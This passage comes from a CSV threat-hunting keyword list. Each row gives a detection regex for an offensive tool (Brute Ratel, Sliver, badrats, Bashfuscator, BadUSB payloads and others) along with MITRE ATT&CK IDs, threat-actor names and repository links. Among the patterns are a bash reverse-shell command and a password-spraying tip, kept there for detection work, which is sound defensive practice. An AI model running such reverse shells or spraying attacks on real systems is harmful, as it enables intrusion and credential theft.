T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*Bad password counts dont replicate between domain controllers. Only the PDC knows the real amount of those. Be sure to target the PDC so that accounts don't get locked out*",".{0,1000}Bad\spassword\scounts\sdont\sreplicate\sbetween\sdomain\scontrollers\.\sOnly\sthe\sPDC\sknows\sthe\sreal\samount\sof\sthose\.\sBe\ssure\sto\starget\sthe\sPDC\sso\sthat\saccounts\sdon\'t\sget\slocked\sout.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60*",".{0,1000}bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359*",".{0,1000}badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*badger_exports.h*",".{0,1000}badger_exports\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_no_acl_1030_objects.log*",".{0,1000}badger_no_acl_1030_objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs 
written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*badger_svc.exe*",".{0,1000}badger_svc\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_template.ps1*",".{0,1000}badger_template\.ps1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64.exe*",".{0,1000}badger_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*badger_x64_*.bin*",".{0,1000}badger_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64_aws.exe*",".{0,1000}badger_x64_aws\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64_stealth_rtl.txt*",".{0,1000}badger_x64_stealth_rtl\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*BadgerAtoi*",".{0,1000}BadgerAtoi.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - 
T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerDispatch*",".{0,1000}BadgerDispatch.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerDispatchW*",".{0,1000}BadgerDispatchW.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerMemcpy*",".{0,1000}BadgerMemcpy.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerMemset*",".{0,1000}BadgerMemset.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and 
Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerStrcmp*",".{0,1000}BadgerStrcmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerStrlen*",".{0,1000}BadgerStrlen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcscmp*",".{0,1000}BadgerWcscmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcslen*",".{0,1000}BadgerWcslen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Bad-Pdf*",".{0,1000}Bad\-Pdf.{0,1000}","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","1031","212","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" "*BadPotato.cs*",".{0,1000}BadPotato\.cs.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BadPotato.exe*",".{0,1000}BadPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*badpotato.exe*",".{0,1000}badpotato\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badrat.smb.hta*",".{0,1000}badrat\.smb\.hta.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat.smb.js*",".{0,1000}badrat\.smb\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.csproj*",".{0,1000}badrat_cs\.csproj.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.exe *",".{0,1000}badrat_cs\.exe\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.exe.config*",".{0,1000}badrat_cs\.exe\.config.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_server.py *",".{0,1000}badrat_server\.py\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*badrats-c2-initial-access-payloads.html*",".{0,1000}badrats\-c2\-initial\-access\-payloads\.html.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrats-master.zip*",".{0,1000}badrats\-master\.zip.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*BadUSB_AddAdmin.ino*",".{0,1000}BadUSB_AddAdmin\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_DownloadExecute.ino*",".{0,1000}BadUSB_DownloadExecute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_FacebookPost.ino*",".{0,1000}BadUSB_FacebookPost\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_HideWindow.ino*",".{0,1000}BadUSB_HideWindow\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_LockYourComputer.ino*",".{0,1000}BadUSB_LockYourComputer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadZure-main*",".{0,1000}BadZure\-main.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*bananaKitten.exe*",".{0,1000}bananaKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*BaRMIe*",".{0,1000}BaRMIe.{0,1000}","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","8","707","99","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" "*baron-samedit-heap-based-overflow-sudo.txt*",".{0,1000}baron\-samedit\-heap\-based\-overflow\-sudo\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is a utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*bash 
./bounce.sh*",".{0,1000}bash\s\.\/bounce\.sh.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*bash -i &>/dev/tcp/* <&1*",".{0,1000}bash\s\-i\s\&\>\/dev\/tcp\/.{0,1000}\s\<\&1.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*bash lse.sh*",".{0,1000}bash\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*bash_executor *",".{0,1000}bash_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*bash_read_line_reverse_tcp.py*",".{0,1000}bash_read_line_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*bashfuscator -*",".{0,1000}bashfuscator\s\-.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator Team*",".{0,1000}Bashfuscator\sTeam.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashfuscator.py*",".{0,1000}bashfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator-master*",".{0,1000}Bashfuscator\-master.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced 
Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*BasicServiceExploit.class*",".{0,1000}BasicServiceExploit\.class.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
